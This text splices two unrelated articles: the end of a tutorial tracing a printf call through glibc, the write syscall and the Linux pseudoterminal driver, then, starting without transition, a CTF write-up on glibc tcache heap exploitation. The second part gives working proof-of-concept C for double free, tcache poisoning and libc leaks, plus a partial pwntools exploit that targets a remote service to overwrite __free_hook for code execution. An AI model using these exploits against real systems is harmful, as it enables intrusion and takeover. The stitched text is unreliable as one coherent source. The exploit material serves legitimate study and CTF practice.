$ gdb ./printf1_s … main at printf1.c:5 5 printf(«Hello World %d\n», 1); 0x400e02 5 printf(«Hello World %d\n», 1); 0x401d30 in printf () 0x414600 in vfprintf () 0x40c110 in strchrnul () 0x414692 in vfprintf () 0x423c10 in _IO_new_file_xsputn () 0x424ba0 in _IO_new_file_overflow () 0x425ce0 in _IO_doallocbuf () 0x4614f0 in _IO_file_doallocate () 0x4235d0 in _IO_file_stat () 0x40f8b0 in _fxstat ()   ### fstat syscall 0x461515 in _IO_file_doallocate () 0x410690 in mmap64 ()   ### mmap syscall 0x46155e in _IO_file_doallocate () 0x425c70 in _IO_setb () 0x461578 in _IO_file_doallocate () 0x425d15 in _IO_doallocbuf () 0x424d38 in _IO_new_file_overflow () 0x4243c0 in _IO_new_do_write () 0x423cc1 in _IO_new_file_xsputn () 0x425dc0 in _IO_default_xsputn () …cut 11 repeats of last 2 functions… 0x425e7c in _IO_default_xsputn () 0x423d02 in _IO_new_file_xsputn () 0x41475e in vfprintf () 0x414360 in _itoa_word () 0x4152bb in vfprintf () 0x423c10 in _IO_new_file_xsputn () 0x40b840 in mempcpy () 0x423c6d in _IO_new_file_xsputn () 0x41501f in vfprintf () 0x40c110 in strchrnul () 0x414d1e in vfprintf () 0x423c10 in _IO_new_file_xsputn () 0x40b840 in mempcpy () 0x423c6d in _IO_new_file_xsputn () 0x424ba0 in _IO_new_file_overflow () 0x4243c0 in _IO_new_do_write () 0x4235e0 in _IO_new_file_write () 0x40f9c7 in write () 0x40f9c9 in __write_nocancel ()   ### write syscall happens here 0x423623 in _IO_new_file_write () 0x42443c in _IO_new_do_write () 0x423cc1 in _IO_new_file_xsputn () 0x414d3b in vfprintf () 0x408450 in free () 0x41478b in vfprintf () 0x408450 in free () 0x414793 in vfprintf () 0x401dc6 in printf () main at printf1.c:6

This call trace shows the entire execution for this printf example. If you stare closely at this code trace, we can follow this basic logic:

  • printf passes string and formats to vfprintf
  • vfprintf starts to parse and attempts its first buffered write
  • Oops — buffer needs to be allocated. Let’s find some memory
  • vfprintf back to parsing…
  • Copy some results to a final location
  • We’re done — call write()
  • Clean up this mess

Let’s look at some of the functions:

_IO_*These functions are part of GCC’s libio module, which manage the internal stream buffer. Just looking at the names, we can guess that there is a lot of writing and memory allocation. The source code for most of these operations is in the files fileops.c and genops.c.

_fxstat pulls the state of file descriptors. Since this is system dependent, it’s located at /sysdeps/unix/sysv/linux/fxstat64.c.

The remaining functions are covered in detail in the next two steps.

Let’s dig more!


Step 7 — Format string resolved

Goal: Solve the format problem

Let’s think about our input string, Hello World %d\n. There are three distinct sections that need to be processed as we scan across is from left to right.

  • 'Hello World ' — simple put
  • %d — substitute the integer literal ‘1’
  • \n — simple put

Now referring back to our trace, we can find three code sections that suggest where to look for the formatting work:

0x400e02 5  printf("Hello World %d\n", 1);
0x401d30 in printf ()
0x414600 in vfprintf ()
0x40c110 in strchrnul ()           # string scanning
0x414692 in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering 'Hello World '
...
0x41475e in vfprintf ()
0x414360 in _itoa_word ()          # converting integer
0x4152bb in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering '1'
...
0x41501f in vfprintf ()
0x40c110 in strchrnul ()           # string scanning
0x414d1e in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering '\n'
...

A few function calls after that final vfprintf() call is the hand off to the kernel. The formatting must have happened in vfprintf between the instructions indicated above. All substitutions handed pointers to the finished string to libio for line buffering. Let’s take a peek at the first round only:

The hand off to xsputn requires vfprintf to identify the start location in the string and a size. The start is already known (current position), but it’s up to strchrnul() to find a pointer to the start of the next ‘%’ or the end of string. We can follow the parsing rules in GCC source code (/stdio-common/printf-*).

from glibc/stdio-common/printf-parse.h:

/* Find the next spec in FORMAT, or the end of the string.  Returns
   a pointer into FORMAT, to a '%' or a '\0'.  */
__extern_always_inline const unsigned char *
__find_specmb (const unsigned char *format)
{
  return (const unsigned char *) __strchrnul ((const char *) format, '%');
}

Or we can look in the compiled binary (my preferred timesink):

in vfprintf:
  0x414668 <+104>: mov    esi,0x25   # Setting ESI to the '%' symbol
  0x41466d <+109>: mov    rdi,r12    # Pointing RDI to the format string
  ...saving arguments...
  0x41468d <+141>: call   0x40c110 <strchrnul> # Search for next % or end

in strchrnul:
  0x40c110 <+0>: movd   xmm1,esi   # Loading up an SSE register with '%'
  0x40c114 <+4>: mov    rcx,rdi    # Moving the format string pointer
  0x40c117 <+7>: punpcklbw xmm1,xmm1 # Vector-izing '%' for a fast compare
  ...eventual return of a pointer to the next token...

Long story short, we’ve located where formats are found and processed.

That’s going to be the limit of peeking at source code for glibc. I don’t want this article to become an ugly mess. In any case, the buffer is ready to go after all three format processing steps.


Step 8 — Final string written to standard output

Goal: Follow events leading up to the kernel syscall

The formatted string, «Hello World 1», now lives in a buffer as part of the stdout file stream. stdout to a console is usually line buffered, but exceptions do exist. All cases for console stdout eventually lead to the ‘write’ syscall, which is prototyped for the particular system. UNIX(-like) systems conform to the POSIX standard, if only unofficially. POSIX defines the write syscall:

ssize_t write(int fildes, const void *buf, size_t nbyte);

From the trace in step 6, recall that the functions leading up to the syscall are:

0x4235e0 in _IO_new_file_write ()  # libio/fileops.c
0x40f9c7 in write ()               # sysdeps/unix/sysv/linux/write.c
0x40f9c9 in __write_nocancel ()    # various macros in libc and linux
  ### write syscall happens here

The link between the compiler and operating system is the ABI, and is architecture dependent. That’s why we see a jump from libc’s libio code to our test case architecture code under (gcc)/sysdeps. When your standard library and OS is compiled for your system, these links are resolved and only the applicable ABI remains. The resulting write call is best understood by looking at the object code in our program (printf1_s).

First, let’s tackle one of the common complaints from beginners reading glibc source code…the 1000 difference ways write() appears. At the binary level, this problem goes away after static-linking. In our case, write() == __write() == __libc_write()

$ nm printf1_s | grep write
6b8b20 D _dl_load_write_lock
41f070 W fwrite
400575 t _i18n_number_rewrite
40077f t _i18n_number_rewrite
427020 T _IO_default_write
4243c0 W _IO_do_write
4235e0 W _IO_file_write
41f070 T _IO_fwrite
4243c0 T _IO_new_do_write
4235e0 T _IO_new_file_write
421c30 T _IO_wdo_write
40f9c0 T __libc_write     ## Real write in symbol table
43b220 T __libc_writev
40f9c0 W write            ## Same address -- weak symbol
40f9c0 W __write          ## Same address -- weak symbol
40f9c9 T __write_nocancel
43b220 W writev
43b220 T __writev

So any reference to these symbols actually jumps to the same executable code. For what it’s worth, writev() == __writev(), and fwrite() == _IO_fwrite

And what does __libc_write look like…?

000000000040f9c0 <__libc_write>:
  40f9c0:  83 3d c5 bb 2a 00 00   cmpl   $0x0,0x2abbc5(%rip)  # 6bb58c <__libc_multiple_threads>
  40f9c7:  75 14                  jne    40f9dd <__write_nocancel+0x14>

000000000040f9c9 <__write_nocancel>:
  40f9c9:	b8 01 00 00 00       	mov    $0x1,%eax
  40f9ce:	0f 05                	syscall 
  ...cut...

Write simply checks the threading state and, assuming all is well, moves the write syscall number (1) in to EAX and enters the kernel.

Some notes:

  • x86-64 Linux write syscall is 1, old x86 was 4
  • rdi refers to stdout
  • rsi points to the string
  • rdx is the string size count

Step 9 — Driver writes output string

Goal: Show the execution steps from syscall to driver

Now we’re in the kernel with rdi, rsi, and rdx holding the call parameters. Console behavior in the kernel depends on your current environment. Two opposing cases are if you’re printing to native console/CLI or in a desktop pseudoterminal, such as GNOME Terminal.

I tested both types of terminals on my system and I’ll walk through the desktop pseudoterminal case. Counter-intuitively, the desktop environment is easier to explain despite the extra layers of work. The PTY is also much faster — the process has exclusive use of the pty where as many processes are aware of (and contend for) the native console.

We need to track code execution within the kernel, so let’s give Ftrace a shot. We’ll start by making a short script that activates tracing, runs our program, and deactivates tracing. Although execution only lasts for a few milliseconds, that’s long enough to produce tens or hundreds of thousands of lines of kernel activity.

#!/bin/sh
echo function_graph > /sys/kernel/debug/tracing/current_tracer
echo 1 > /sys/kernel/debug/tracing/tracing_on
./printf1_s
echo 0 > /sys/kernel/debug/tracing/tracing_on
cat /sys/kernel/debug/tracing/trace > output

Here is what happens after our static-linked printf executes the write syscall in a GNOME Terminal:

7)           | SyS_write() {
7)           |  vfs_write() {
7)           |   tty_write() {
7) 0.053 us  |    tty_paranoia_check();
7)           |    n_tty_write() {
7) 0.091 us  |     process_echoes();
7)           |     add_wait_queue()
7) 0.026 us  |     tty_hung_up_p();
7)           |     tty_write_room()
7)           |     pty_write() {
7)           |      tty_insert_flip_string_fixed_flag()
7)           |      tty_flip_buffer_push() {
7)           |       queue_work_on()
7)+10.288 us |      } /* tty_flip_buffer_push */
7)           |      tty_wakeup() 
7)+14.687 us |     } /* pty_write */
7)+57.252 us |    } /* n_tty_write */
7)+61.647 us |   } /* tty_write */
7)+64.106 us |  } /* vfs_write */
7)+64.611 us | } /* SyS_write */

This output has been culled to fit this screen. Over 1000 lines of kernel activity were cut within SyS_write, most of which were locks and the kernel scheduler. The total time spent in kernel is 65 microseconds. This is in stark contrast to the native terminal, which took over 6800 microseconds!

Now is a good time to step back and think about how pseudoterminals are implemented. As I was researching a good way to explain it, I happened upon an excellent write up by Linus Åkesson. He explains far better than I could. This diagram he drew up fits our case perfectly.

The TL;DR version is that pseudoterminals have a master and a slave side. A TTY driver provides the slave functionality while the master side is controlled by a terminal process.

Let’s demonstrate that on my system. Recall that I’m testing through a gnome-terminal window.

$ ./printf1_s
Hello World 1
^Z
[1]+  Stopped                 ./printf1_s
$ top -o TTY
printf tty/pts usage

bash is our terminal parent process using pts/0. The shell forked (cloned) top and printf. Both inherited the bash stdin and stdout.

Let’s take a closer look at the pts/0 device the kernel associates with our printf1_s process.

$ ls -l /dev/pts/0
crw--w----. 1 maizure tty 136, 0 Apr  1 09:55 /dev/pts/0

Notice that the pseudoterminal itself is associated with a regular tty device. It also has a major number 136. What’s that?

From this linux kernel version sourceinclude/uapi/linux/major.h

...
#define UNIX98_PTY_MASTER_MAJOR	128
#define UNIX98_PTY_MAJOR_COUNT	8
#define UNIX98_PTY_SLAVE_MAJOR	(UNIX98_PTY_MASTER_MAJOR+UNIX98_PTY_MAJOR_COUNT)
...

Yes, this major number is associated with a pseudoterminal slave (Master = 128, Slave = 128 + 8 = 136). A tty driver is responsible for its operation. If we revisit our write syscall trace, this makes sense:

...cut from earlier
7)           |  pty_write() {
7)           |      tty_insert_flip_string_fixed_flag()
7)           |      tty_flip_buffer_push() {
7)           |          queue_work_on()
7)+10.288 us |      }
7)           |      tty_wakeup() 
7)+14.687 us |  } /* pty_write */
...

The pty_write() function invokes tty_* operations, which we assume moves ‘Hello World 1’ to the console. So where is this console?


Step 10 — Console output buffer is updated

Goal: Put the string to the console attached to stdout

The first argument to pty_write is struct tty_struct *ttyThis struct contains the console, which is created with each unique tty process. In this case, the parent terminal created the pts/0 console and each child simply points to it.

The tty has many interesting parts to look at: line discipline, driver operations, the tty buffer(s), the tty_port. In the interest of space, I’m not going to cover tty initialization since it’s not on the direct path for printf — the process was created, the tty exists, and it wants this ‘Hello World 1’ right now!

The string is copied to the input queue in tty_insert_flip_string_fixed_flag().

memcpy(tb->char_buf_ptr + tb->used, chars, space); 
memset(tb->flag_buf_ptr + tb->used, flag, space);
tb->used += space;
copied += space;
chars += space;

This moves the data and flags to the current flip buffer. The console state is updated and the buffer is pushed:

if (port->low_latency)
    flush_to_ldisc(&buf->work);
else
    schedule_work(&buf->work);

Then the line discipline is notified to add the new string to the output window in tty_wakeup(). The typical case involves a kernel work queue, which is necessarily asynchronous. The string is waiting in the buffer with the signal to go. Now it’s up to the PT master to process it.

Our master is the gnome_temrinal, which manages the window context we see on screen. The buffer will eventually stream to the console on the kernel’s schedule. In a native console (not X server), this would be a segment of raw video memory. Once the pty master processes the new data…


Step 11 — Hello world!

Goal: Rejoice

$ ./printf1_s
Hello World 1

$

Success!
Now you know how it works on my system. How about yours?


FAQ

Why did you put this article together?
Recently, I was asked about how some functions are implemented several times over a short period and I couldn’t find a satisfactory resource to point to. Many blog posts focused too much on digging through byzantine compiler source code. I found that approach unhelpful because the compiler and standard library are only one part of the problem. This system-wide approach gives beginners a foundation, a path to follow, and helpful experiments to adapt to their own use.

What did you leave out?
Too much! It’ll have to wait until ‘printf() in 2500 seconds’. In no particular order:

  • Details about how glibc implements buffering
  • Details of how the GNOME console manages the terminal context
  • Flip buffer mechanics for ttys (similar to video backbuffers)
  • More about Linux work queues used in the tty driver
  • More discussion of how this process varies among architectures
  • Last (and definitely least): Untangling the mess inside vfprintf

How did you get gdb to print out that trace in step 6?
I used a separate file for automating gdb input and captured the output to another file.

$cat gdbcmds
start
stepi
stepi
stepi
stepi
...about 1000 more stepi...

$gdb printf1_s -x gdbcmds > printf1_s_dump

children tcache which is one NULL byte buffer overflow on the heap

( Original text by  )

This article is intended for the people who already have some knowledge about heap exploitation. If you already know some heap attacks on glibc<2.26 it’ll be fully understandable to you. But if you don’t, don’t worry — I’ve tried to make this post approachable for everyone with just basic knowledge. If you really know nothing about the topic, I recommend heap-exploitation.

Tcache is an internal mechanism responsible for heap management. It was introduced in glibc 2.26 in the year 2017. It’s objective is to speed up the heap management. Older algorithms are not removed, but they are still used sometimes — for example for bigger chunks, or when an appropriate tcache bin is full. But heap exploitation with this mechanism is a lot easier due to a lack of heap integrity checks.

The convention used in this post is that we call the pointer to the next chunk fd, and to the previous — bk as it is called originally in normal heap chunk.

Tcache overview

You can grab glibc 2.26 from here. The all source code that is interesting for us is located in a file malloc/malloc.c.

In this version of glibc two new functions were created:

static void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);
  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

static void *
tcache_get (size_t tc_idx)
{
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  assert (tcache->entries[tc_idx] > 0);
  tcache->entries[tc_idx] = e->next;
  --(tcache->counts[tc_idx]);
  return (void *) e;
}

Both of these functions can be called at the beginning of functions _int_free and __libc_malloc.tcache_put is called when the requested size of the allocated region is not greater than 0x408 and tcache bin that is appropriate for a given size is not full. A maximum number of chunks in one tcache bin is mp_.tcache_count and this variable is set to 7 by default. This variable is set here and the root is at the following piece of code:

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7
#endif

tcache_get is called when we request a chunk of the size of tcache bin and the appropriate bin contains some chunks. Every tcache bin contains chunks of only one size. From the code above we can see that it is a single linked list, similar to fastbin — it contains only a pointer to a next chunk. Also, the list is LIFO, like in fastbins. But there is a difference — each tcache bin remebers how many chunks belong to this bin in a variable tcache->counts[tc_idx].

What’s strange calloc doesn’t allocate from tcache bin.

If you want to test how tcache behaves, you can use pwndbg and compile malloc_playground.

a@x:~/Desktop/how2heap_mycp$ gdb -q ./mp
pwndbg: loaded 170 commands. Type pwndbg [filter] for a list.
pwndbg: created $rebase, $ida gdb functions (can be used with print/break)


Reading symbols from ./mp...(no debugging symbols found)...done.
pwndbg> r
Starting program: /home/a/Desktop/how2heap_mycp/mp 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
> malloc 0x50
==> 0x555555559670
> malloc 0x50
==> 0x5555555596d0
> malloc 0x61
==> 0x555555559730
> free 0x555555559670
==> ok
> free 0x5555555596d0
==> ok
> free 0x555555559730
==> ok
> ^C
Program received signal SIGINT, Interrupt.
[...]
pwndbg> bins
tcachebins
0x60 [  2]: 0x5555555596d0 —▸ 0x555555559670 ◂— 0x0
0x70 [  1]: 0x555555559730 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty
pwndbg> 

Tcache attacks

Due to a lack of integrity checks in tcache, many attacks are easier.

double free

Let’s consider a double free vulnerability as a first example:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	char *a = malloc(0x38);
	free(a);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

As a result, we got the same pointer 2 times.

On older glibc (<2.26) to get the same result this attack is a bit more complicated:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	printf("%s","hello\n");
	char *a = malloc(0x38);
	char *b = malloc(0x38);
	free(a);
	free(b);
	free(a);
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
	printf("%p\n", malloc(0x38));
} 

output:

hello
0x602420
0x602460
0x602420

We additionally need to free another chunk between due to this integrity check — we cannot add a new chunk to a fastbin list when there is already the same chunk on top. printf is called at the beginning because program crashes otherwise. Probably this is because when printf is called for the first time it initializes his buffer by mallocing some area.

House of Spirit

House of Spirit is also super easy:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long int var[10];
	var[1] = 0x40; // set the size of the chunk to 0x40

	free(&var[2]);
	char *a=malloc(0x38);
	printf("%p %p\n",a ,&var[2]);
}

output:

0x7fff899700c0 0x7fff899700c0

By freeing never allocated region we put it in the tcache bin list. And we can obtain this region when malloc is called with appropriate size as an argument. This is useful when we have the ability to overwrite some pointer by buffer overflow.

In older glibc we needed to put more effort due to this healthcheck. We need to create another fake chunk after the fried one. Like here.

tcache/fastbin poisoning

If we want to exploit malloc to return a pointer to a controlled location we can simply overwrite a pointer to a next chunk. We can forget about this integrity check in older mechanism:

#include <stdlib.h>
#include <stdio.h>

char var[]="aaaaaaaaaaaaaaa";

int main()
{
	long *a = malloc(0x38);
	long *b = malloc(0x38);
	free(a);
	free(b);
	// tcache bin 0x38 contains: b -> a 
	b[0]=&var;
	// tcache bin 0x38 contains: b -> var
	malloc(0x38);
	// tcache bin 0x38 contains: var
	char *c=malloc(0x38);
	printf("%s\n",c);
}

output:

aaaaaaaaaaaaaaa

We cannot do this by freeing only one chunk because each tcache bin remebers how many chunks belong to this bin.

libc leak

If we want to leak the libc address on glibc 2.26 we can do this:

#include <stdlib.h>
#include <stdio.h>

int main()
{
	long *a = malloc(0x1000);
	malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}  

This program prints fd of the chunk inside an unsorted bin. fd of the last chunk and bk in the first chunk in an unsorted bin are set to a pointer in libc.

If we can request malloc of at most 0x100 size this won’t work because the fried chunk won’t go to an unsorted bin list but to a tcache bin. It works only with older glibc:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	free(a);
	printf("%p\n",a[0]);
}

Hopefully if we make tcache bin full (max capacity is 7 chunks), deallocated chunk will be put in unsorted bin:

#include <stdlib.h>
#include <stdio.h>

int main(int argc , char* argv[])
{
	long* t[7];
	long *a=malloc(0x100);
	long *b=malloc(0x10);
	
	// make tcache bin full
	for(int i=0;i<7;i++)
		t[i]=malloc(0x100);
	for(int i=0;i<7;i++)
		free(t[i]);
	
	free(a);
	// a is put in an unsorted bin because the tcache bin of this size is full
	printf("%p\n",a[0]);
} 

tcache attacks summary

More attacks exist for glibc with tcache. For example House of Force works in the same way as previously. Also, it’s easy to make overlapping chunks by overwriting size to a bigger value. After tcache was introduced heap exploitation is much easier. The exception is a buffer overflow by a single NULL byte, like in children tcache CTF task. I used an old attack with chunks of the smallbin size. I prevented them from going into the tcache, by making the tcache bin full.

Children Tcache overview

In this task we have 2 binaries: task and libc

The version of libc is 2.27 but there is no difference between 2.26 and 2.27 for us:

a@x:~/Desktop/children_tcache$ strings libc.so.6 | grep LIBC
[...]
GNU C Library (Ubuntu GLIBC 2.27-3ubuntu1) stable release version 2.27.

Decompiled binary looks like below:

unsigned __int64 new_heap()
{
  signed int i; // [rsp+Ch] [rbp-2034h]
  char *ptr; // [rsp+10h] [rbp-2030h]
  unsigned __int64 size; // [rsp+18h] [rbp-2028h]
  char s; // [rsp+20h] [rbp-2020h]
  unsigned __int64 v5; // [rsp+2038h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  memset(&s, 0, 0x2010uLL);
  for ( i = 0; ; ++i )
  {
    if ( i > 9 )
    {
      puts(":(");
      return __readfsqword(0x28u) ^ v5;
    }
    if ( !pointers[i] )
      break;
  }
  printf("Size:");
  size = read_atoll();
  if ( size > 0x2000 )
    exit(-2);
  ptr = (char *)malloc(size);
  if ( !ptr )
    exit(-1);
  printf("Data:");
  read_data((__int64)&s, size);
  strcpy(ptr, &s);
  pointers[i] = ptr;
  sizes[i] = size;
  return __readfsqword(0x28u) ^ v5;
}

int show_heap()
{
  const char *v0; // rax
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v2 = read_atoll();
  if ( v2 > 9 )
    exit(-3);
  v0 = pointers[v2];
  if ( v0 )
    LODWORD(v0) = puts(pointers[v2]);
  return (signed int)v0;
}

int delete_heap()
{
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  printf("Index:");
  v1 = read_atoll();
  if ( v1 > 9 )
    exit(-3);
  if ( pointers[v1] )
  {
    memset((void *)pointers[v1], 0xDA, sizes[v1]);
    free((void *)pointers[v1]);
    pointers[v1] = 0LL;
    sizes[v1] = 0LL;
  }
  return puts(":)");
}

TL;DR:

We can

  • create chunk on the heap and read data into it
  • delete a chunk
  • print data in a chunk

Everything is fine, except new_heap function which is vulnerable to buffer overflow by single NULL byte. Before free, the area is filled with 0xDA byte. We can have max 10 chunks allocated at the same time and maximum requested size of a chunk is 0x2000.

In older version of glibc this attack works:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // alocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of  a|b|c
    char *A = malloc(0x108);
    char *B = malloc(0xF8);
    printf("A: %p\n",A); 
    printf("B: %p\n",B);

    free(b);
    // leak libc
    printf("B content: %p\n",((long*)B)[0]);
}

output:

a: 0x602010
b: 0x602120
A: 0x602010
B: 0x602120
B content: 0x7ffff7dd1b78

Normally, when we free chunk of the size of smallbin, there is a check whether its neighbour is freed. If so, it will consolidate with it. When we free c chunk it consolidates with a and b because of 2 reasons:

  • We have cleared the PREV_INUSE bit of chunk c so it thinks that its previous neighbour is freed.
  • We have set prev_size of chunk c to value 0x210 which is a total size of chunks a and b.

This attack can be shorter:

#include<stdlib.h>
#include<stdio.h>
 
int main()
{
    // alocate 3 chunks
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);

    printf("a: %p\n",a);
    printf("b: %p\n",b); 

    free(a);
    
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    
    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);

    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A); 

    // leak libc
    printf("B content: %p\n",((long*)b)[0]);
}
a: 0x602010
b: 0x602120
A: 0x602010
B content: 0x7ffff7dd1b78

In the end, we skipped allocation and deletion of B chunk because it is not needed. After c is freed, we have one unsorted bin that contains the area that is a summary of ab and c areas. After we allocated chunk A, the unsorted bin split to 2 parts. One part was returned by malloc, the other part remained at the unsorted bin and the chunk begins at the same place when b.

In our examples, the first allocated chunk has a different size than others which is 0x108. The example would work with 0xf8 but in this challenge, strcpy is used so it breaks on NULL byte so we couldn’t overwrite prev_size by 0x200 value. With size equal to 0x108 we can overwrite prev_size to 0x210.

We can accomplish the same attack on a newer libc, by using the same algorithm. But there is one difference — before freeing chunks we need to make tcache bin full. So the attack below does the same leak as the attack previously but also it goes further. After the leak, it causes double free because Band b point to the same chunk of size 0x1f8. Later, this attack is performed.

#include<stdlib.h>
#include<stdio.h>
 
char* tcache1[7]; 
char* tcache2[7]; 
 
long var;
 
int main()
{
    char *a = malloc(0x108);
    char *b = malloc(0xf8);
    char *c = malloc(0xf8);
	

    printf("a: %p\n",a);
    printf("b: %p\n",b); 
    printf("c: %p\n",c);

    // make 0xf8 tcache full
    for(int i=0;i<7;i++)
        tcache1[i]=malloc(0xF8);
    for(int i=0;i<7;i++)
        free(tcache1[i]);

    // make 0x108 tcache full
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    free(a); // a goes to an unsorted bin

    tcache1[0]=malloc(0xF8);//creates one free place in 0xf8 tcache 
    // b will go to tcache after free(). 

    // in the CTF task we can only write data to chunks
    // right after mallocing this chunk
    free(b);
    b = malloc(0xf8);
    // buffer overflow b by 1 NULL byte
    b[0xf8] = '\x00'; //clear prev in use of c
    *(long*)(b+0xf0) = 0x210; //We can set prev_size of c to 0x210 bytes
    printf("b: %p\n",b);
   
    // make 0xf8 tcache full
    free(tcache1[0]);

    // c have prev_in_use=0 and prev_size=0x210 so it will consolidate 
    // with a and b and it will be put in unsorted bin
    free(c);
    
    // make 0x108 tcache empty
    for(int i=0;i<7;i++)
        tcache2[i]=malloc(0x108);


    // now we can allocate chunks from the area of a|b|c
    char *A = malloc(0x108);
    printf("A: %p\n",A);

    // leak libc
    printf("b content: %p\n",((long*)b)[0]);

    // make 0x108 tcache full because we can have max 10 chunks allocated 
    for(int i=0;i<7;i++)
        free(tcache2[i]);

    // Both 0xf8 and 0x108 tcache bins are full

    // let's allocate chunk that overlaps b.
    char *B = malloc(0x1F8);
    printf("B: %p\n",B);

    // now, chunks B and b are allocated and have the same address. 
    // now we can use double free and tcache poisoning attack

    // double free
    free(B);
    free(b);
    // now, 0x1F8 tcache bin contains 2 the same chunks 

    // allocate one of them and set next pointer to known address
    b = malloc(0x1F8);
    *(long*)(b) = &var;
    
    malloc(0x1F8);
	
    // the allocated chunk will have an address of variable var
    char *super_pointer = malloc(0x1F8);
	
    printf("%p %p\n",super_pointer,&var);
}

output:

a: 0x55c054fa2260
b: 0x55c054fa2370
c: 0x55c054fa2470
b: 0x55c054fa2370
A: 0x55c054fa2260
b content: 0x7f60c1026ca0
B: 0x55c054fa2370
0x55c053972060 0x55c053972060

And the last step is to implement an exploit in python. It does the same thing as previous code, except that malloc returns to us a region at &__free_hook. Then we overwrite __free_hook to one-gadget RCE. Later it calls free.

from pwn import *

r = remote("localhost", 1337)
#r = remote("54.178.132.125",8763)
pointers = [False]*10

def menu():
    print r.recvuntil("choice: ") 

def new_heap(size, data):
    #find idx
    global pointers
    idx = None
    for i in range(10):
        if not pointers[i]:
            pointers[i] = True
            idx = i
            break
    assert(idx is not None)
	
    r.send("1")
    print r.recvuntil("Size:")
    r.send(str(size))
    print r.recvuntil("Data:")
    r.send(data)
    menu()
    return idx
	
def show_heap(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
	
def show_heap_leak(idx):
    r.send("2")
    print r.recvuntil("Index:")
    r.send(str(idx))
    data = r.recvuntil("choice: ")
    addr = data.split("\n")[0]
    addr = addr.ljust(8,"\x00")
    return u64(addr)
	
	
def delete_heap(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    menu()
    return None
	
def delete_heap_and_shell(idx):
    global pointers
    assert (pointers[idx]==True)
    pointers[idx]=False
	
    r.send("3")
    print r.recvuntil("Index:")
    r.send(str(idx))
    r.interactive()

tcache1 = [None]*10
tcache2 = [None]*10
	
menu()
a = new_heap(0x108,"a"*10)
b = new_heap(0xf8,"b"*10)
c = new_heap(0xf8,"c"*10)

# make 0xf8 tcache full
for i in range(7):
    tcache1[i] = new_heap(0xF8, "sss"+str(i))
for i in range(7):
    tcache1[i] = delete_heap(tcache1[i])

# make 0x108 tcache full 
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

a = delete_heap(a) #a goes to an unsorted bin

tcache1[0] = new_heap(0xF8, "sss0") #create one free place in 0xf8 tcache

# buffer overflow by 1 NULL byte
b = delete_heap(b);
b = new_heap(0xf8,"b"*0xf8) #clear prev in use of c

# Clear prev size
# This is tricki because data to chunk is copied by strcpy which 
# stops copying on NULL byte.
# If we want to clean an region we need to free and allocate several
# chunks that each next size is lower than 1 byte.  
for i in range(0xf8, 0xf3, -1):
    b = delete_heap(b);
    b = new_heap(i-1,(i-1)*"b")

# set prev_size of c to 0x210 bytes
b = delete_heap(b);
b = new_heap(0xF2,"b"*0xf0+"\x10\x02")

# make 0xf8 tcache full
tcache1[0] = delete_heap(tcache1[0])

# c have prev_in_use=0 and prev_size=0x210 so it will consolidate
# with a and b and it will be put in unsorted bin
c = delete_heap(c)

# make 0x108 tcache empty
for i in range(7):
    tcache2[i] = new_heap(0x108, "sss"+str(i))

# now we allocate chunks from area of  a|b|c
A = new_heap(0x108, "AAA")

# leak libc
addr=show_heap_leak(b)
libc_base = addr - 0x3ebca0
free_hook = libc_base + 0x3ed8e8
print "libc base = "+hex(libc_base)
print "free hook = "+hex(free_hook)


# make 0x108 tcache full because we can have max 10 chunks allocated
for i in range(7):
    tcache2[i] = delete_heap(tcache2[i])

# Both 0xf8 and 0x108 tcache bins are ful
	
ADDR_TO_WRITE = free_hook	

# let's allocate chunk that overlaps b.
B = new_heap(0x1f8, "BBB")

# now, chunks B and b are allocated and have the same address. 
